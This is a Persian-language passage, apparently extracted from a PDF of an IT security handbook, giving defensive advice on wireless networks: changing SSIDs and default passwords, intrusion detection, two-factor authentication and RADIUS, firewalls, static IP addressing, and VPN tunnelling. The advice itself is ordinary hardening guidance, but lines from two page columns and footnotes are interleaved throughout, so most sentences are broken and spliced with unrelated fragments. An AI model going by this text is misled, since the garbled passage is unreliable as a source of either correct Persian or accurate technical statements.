‫‪ Windows XP‬ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﻣﺮﺗﻜﺐ ﺍﻳﻦ ﺍﺷـﺘﺒﺎﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ‬
‫ﺍﻃﻼﻋــﺎﺕ ‪ SSID‬ﻳــﺎ ﺁﺩﺭﺱ ‪ IP‬ﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ ﺭﺍ ﺍﺯ‬
‫‪ .۱۱‬ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ‪ ،‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ‬
‫‪٢٠٩‬‬ ‫ﻣﻘﺪﺍﺭ ﺍﻭﻟﻴﺔ ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻧﻤﻲﺩﻫﻨﺪ‪ SSID .‬ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ‬
‫ﺷﺒﻜﻪ )‪ ٢٠٨(NIDS‬ﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ‪.‬‬
‫ﻧﺪﻫﻴــﺪ ﻛــﻪ ﻧــﺎﻡ‪ ،‬ﺑﺨــﺸﻬﺎ‪ ،‬ﻭ ﻣﺤــﺼﻮﻻﺕ ﺷــﺮﻛﺖ ﺭﺍ‬
‫‪ .۱۲‬ﺩﺭ ﺳﻄﺢ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺭﺍ ﺭﻭﻱ‬ ‫ﻣـﺸﺨﺺ ﻛﻨــﺪ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ‪SSID‬‬
‫ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬ ‫ﺑﻮﺳﻴﻠﺔ ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺍﻋـﻼﻥ ﻋﻤـﻮﻣﻲ ﻣـﻲﺷـﻮﺩ‪ ،‬ﺑـﻪ‬
‫ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﻛﻠﻴﺪ ‪ WEP‬ﺭﺍ ﺑـﺸﻜﻨﺪ‪ ،‬ﺑﺮﺍﺣﺘـﻲ‬
‫ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺷﺒﻜﺔ ﭼﻪ ﻛـﺴﻲ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ‬
‫‪ ۲۰۷‬ﻣﻨﺒﻊ‪NIPC :‬‬ ‫ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪http://www.nipc.gov/publications/nipcpub/best‬‬
‫‪pract.html‬‬ ‫ﺭﻣﺰ ﻋﺒﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻧﻘﻄـﺔ ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﻣـﺴﻴﺮﻳﺎﺏ‬ ‫‪.۶‬‬
‫‪208 Network Based Intrusion Detection System‬‬
‫‪ ۲۰۹‬ﻣﻨﺒﻊ‪ ،Chris Bateman :‬ﺗﺤﻠﻴﻠﮕﺮ ‪CERT‬‬
‫ﻻ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ‬
‫ﺑﻲﺳﻴﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢١٢‬‬

‫ﻛﺮﺩﻥ ﻣﻘﺼﺪ ﺗﺮﺍﻓﻴـﻚ ﺧـﺎﺭﺝﺷـﺪﻩ ﺍﺯ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ‬ ‫‪ .۱۳‬ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋﺎﻣﻠﻲ‪ ٢١٠‬ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪،‬‬
‫ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪ .‬ﺍﻃﻤﻴﻨـﺎﻥ‬ ‫ﭼﺮﺍﻛﻪ ﺩﺭﺻﺪ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺩﻭ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋـﺎﻣﻠﻲ ﻭﺟـﻮﺩ‬
‫ﺑﻲﺳﻴﻢ ﻭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬ ‫ﺩﺍﺭﺩ‪ .‬ﺭﻭﺵ ﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ‬
‫ﻧﺸﺎﻧﻪ" ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺴﺘﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺩﺭ ﺧـﻮﺩ‬
‫‪ .۱۵‬ﺳﺮﻭﻳﺲ ‪ DHCP‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑـﺮﺍﻱ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫ﺫﺧﻴــــﺮﻩ ﻣــــﻲﻛﻨﻨــــﺪ‪ ٢١١.‬ﺭﻭﺵ ﺩﻭﻡ ﺍﺳــــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺧﻮﺩ ﺍﺯ ﺁﺩﺭﺱ ‪ IP‬ﺛﺎﺑـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩﻫﺎﻱ ‪ ٢١٢RADIUS‬ﺍﺳﺖ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﺤﺪﻭﺩﺓ ﭘﻴﺶ ﻓﺮﺽ ﺁﺩﺭﺱ ‪ IP‬ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ‬
‫ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﺭﺗﺒـﺎﻁ ﺷـﻤﺎ ﺑـﺎ‬
‫ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪.‬‬
‫ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﻛﺎﺭﺑﺮ ﺻﺮﻓﹰﺎ ﺑﻤﻨﻈﻮﺭ‬
‫‪ .۱۶‬ﺗﻨﻬﺎ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻗﺎﺑﻞ ﺍﺭﺗﻘﺎ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﻫﻤﻴـﺸﻪ‬ ‫ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ ﺑــﻪ‬
‫ﭘﻴﺸﺮﻓﺘﻬﺎﻳﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﺠﺎﺩ ﻣﻲﺷـﻮﺩ‪ ،‬ﻭ‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ RADIUS‬ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﺩ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ‬
‫ﻟﺬﺍ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﻘﺎﻁ‬ ‫ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪ RADIUS‬ﻣﺜـﻞ‬
‫ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬ ‫‪٢١٣‬‬
‫ﻧﮕﻬﺒﺎﻥ ﻳﻚ ﺳﺎﻟﻦ‪ ،‬ﻋﺒﻮﺭ ﻭ ﻣﺮﻭﺭ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺩﺭ ﺧﺼﻮﺹ ‪VPN‬‬ ‫‪ .۱۴‬ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻲﺳﻴﻢ ﺑﻌﻨﻮﺍﻥ ‪ gateway‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪ ٢١٤.‬ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﻣﺜﻞ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ‬
‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻫﺮﻳـﻚ ﺍﺯ‬ ‫ﻧﻮﻉ ﺩﻭﻣﻨﺰﻟﻲ‪ ٢١٥‬ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ ﺑﻄﻮﺭﻳﻜﻪ ﺷﺒﻜﺔ ﺑﻲ ﺳـﻴﻢ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺑﺎﻳﺪ ‪ VPN‬ﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ ﻛﻨﻴـﺪ‪،‬‬ ‫ﺩﺭ ﻳﻚ ﻃﺮﻑ ﻭ ﺷﺒﻜﺔ ﻣـﻮﺭﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺍﺧﻠـﻲ ﺩﺭ ﻃـﺮﻑ‬
‫ﺑﻄﻮﺭﻳﻜﻪ ﻫﻤﺔ ‪gateway‬ﻫﺎ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺍﻳـﻦ‬ ‫ﺩﻳﮕﺮ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫‪ VPN‬ﺑﺎﺷﻨﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﻫﻨﮕﺎﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﻣـﻮﺭﺩ‬ ‫ﻣﺜــﻞ ‪ IPSec‬ﻭ ﺳــﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ‪ VPN‬ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺍﺯ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﺍﺳﺎﺳـﹰﺎ ‪ VPN‬ﻳـﻚ‬ ‫ﻣﻲﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ‬ ‫ﺁﻧﻬﺎ ﺑﻪ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ‬
‫ﺭﺍ ﺩﺭ ﻳﻚ ﺷـﺒﻜﺔ ﻋﻤـﻮﻣﻲ ﻭ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣﺜـﻞ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ ﺍﻧﺘﻘـﺎﻝ ﻣـﻲﺩﻫـﺪ‪ .‬ﻓﻨـﺎﻭﺭﻱ ‪ VPN‬ﺑـﻪ‬
‫‪210 Two Factor Authentication‬‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ‬ ‫‪ Bateman ۲۱۱‬ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﺪ ﺍﺯ ﺭﻭﺷﻲ ﻛﻪ ﺍﻭ ﺁﻧـﺮﺍ ‪e-thenticator‬‬
‫ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭﺍﺣﺪﻫﺎ‪ ،‬ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻭ ﺍﺯ ﻃﺮﻳﻖ‬ ‫ﻣﻲﻧﺎﻣﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺨﺼﻮﺹ‪ ،‬ﺍﺛﺮ ﺍﻧﮕﺸﺖ‬
‫ﺷﺴﺖ ﺭﺍ ﺩﺭ ﻳﻚ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ‪ VPN‬ﺍﻳﻨﺘﺮﻧﺖ‬ ‫‪212 Remote Authentication Dial-In User Service‬‬
‫ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﺷﺒﻴﻪﺳﺎﺯﻱﺷﺪﺓ ﺧـﺼﻮﺻﻲ ‪ ٢١٦WAN‬ﺗﺒـﺪﻳﻞ‬ ‫‪ RADIUS ۲۱۳‬ﻳﺎ ﻫﻤﺎﻥ "ﺳﺮﻭﻳﺲ ﺗﻠﻔﻨﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮ"‪،‬‬
‫ﻳﻚ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺭﺳـﻲ‬
‫ﻣﻲﻛﻨﺪ‪ VPN .‬ﻫﻤﭽﻨﻴﻦ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﺩﺍﺩ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﺓ‬
‫ﻣﻲﺩﻫﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﺷـﺮﻛﺖ ﺧـﻮﺩ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺩﻫﺪ‪ .‬ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﭽـﻪ ‪RADIUS‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‪-‬‬
‫ﻫــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ‪ RADIUS‬ﺍﺳــﺖ‪ .‬ﺷــﺒﻜﻪﻫــﺎﻱ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺭﺗﺒـﺎﻃﻲ ﻭﺳـﻴﻊ‬ ‫ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪VPN‬ﻫـﺎ( ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺧﺼﻮﺻﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﺮ ﺩﻭ ﻣـﺎﻧﻊ ﺍﺻـﻠﻲ ﻓـﺎﺋﻖ ﺁﻳﻨـﺪ‪ .‬ﺍﻭﻝ‬ ‫ﺑﺠﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺷﺒﻜﻪ‪ ،‬ﻣﻴﺎﻥ ﺩﻭ ﺷـﺒﻜﻪ‬
‫ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺍﻳﻨﻜﻪ ﺷﺒﻜﻪﻫﺎ ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺭﺗﺒـﺎﻁ‬ ‫ﺷﺪ ﻭ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ RADIUS‬ﺑﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ ﻣﺘـﺼﻞ‬
‫ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ‪ VPN‬ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻏﻴﺮ ﺍﺯ‬ ‫ﮔﺸﺖ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻛـﻪ ﮔـﻮﻳﻲ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻛﻨـﺎﺭ‬
‫‪ IP‬ﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﺑﻪ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ‪ .‬ﺩﻭﻡ ﺍﻳﻨﻜـﻪ‬ ‫ﺷــﺒﻜﻪ ﻭ ﻣﺘــﺼﻞ ﺑــﻪ ﺁﻥ ﺍﺳــﺖ‪ .‬ﺑــﻪ ﻋﺒــﺎﺭﺕ ﺩﻳﮕــﺮ‪ ،‬ﺭﻣﺰﮔــﺬﺍﺭﻱ‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ‪ RADIUS‬ﺗﻨﻬــﺎ ﻣﻴــﺎﻥ ﺁﻥ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩ ﻭ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺼﻮﺭﺕ ﻣـﺘﻦﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ‬ ‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻭ ﻧﻪ ﺩﺭ ﺗﻤﺎﻡ ﺷﺒﻜﻪ‪.‬‬
‫‪ ،Rick Fleming ۲۱۴‬ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﺭﺋﻴﺲ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺖ ﺷﺮﻛﺖ ‪Digital‬‬
‫‪Defense‬‬
‫‪216 Wide Area Network‬‬ ‫‪215 Dual Homed‬‬
‫‪٢١٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﻲﻳﺎﺑﻨﺪ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻫـﺮﻛﺲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺗﺮﺍﻓﻴـﻚ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ‬


‫ﺑﺒﻴﻨﺪ‪ ،‬ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ ﻧﻴـﺰ‬
‫ﻼ‬
‫ﺑﺨﻮﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻳﻚ ﻣﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﺳـﺖ‪ ،‬ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﻣـﺜ ﹰ‬
‫ﺑﺎﻧﻜﻬــﺎ ﺑﺨﻮﺍﻫﻨــﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧــﺖ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ ﺩﺍﺩﻩﻫــﺎﻱ ﻣﻬــﻢ ﻭ‬
‫ﻣﺤﺮﻣﺎﻧﺔ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ VPN .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻣﻲ‬
‫ﺑﻪ ﻧﺎﻡ ﺗﻮﻧﻞ‪ ٢١٧‬ﺑﺮ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﻏﻠﺒﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ‬
‫ﺩﺍﺩﻩ ﻫﺎ ﺑﺠﺎﻱ ﺍﺭﺳﺎﻝﺷﺪﻥ ﺑﺼﻮﺭﺕ ﻋﺎﺩﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ‬
‫ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭﻭﻥ ﻳﻚ ﺑﺴﺘﺔ ‪ IP‬ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ‪،‬‬
‫ﻭ ﺳﭙﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﻣﺜـﻞ ﻣﺤـﺼﻮﻻﺕ ‪،Cisco ،Nokia‬‬
‫‪ ،Checkpoint ،Nortel‬ﻭ ‪ Microsoft‬ﺩﺍﺭﺍﻱ ﻓﻨــــــﺎﻭﺭﻱ‬
‫‪ VPN‬ﺍﻳﻤﻦ ﻭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ‪ ٢١٨‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ‬
‫ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﮔﺮﭼﻪ ‪ VPN‬ﺍﺯ ﻣﺤﺘـﻮﺍﻱ ﺩﺍﺩﻩﻫـﺎﻱ ﺗﺒـﺎﺩﻟﻲ‬
‫ﺭﻭﻱ ﺷﺒﻜﻪ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺴﺘﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ ﭼﮕﻮﻧـﻪ ﺩﺭ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺷـﺒﻜﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺑﺎﺷــﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧﺘﻮﺍﻧـﺪ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ‬


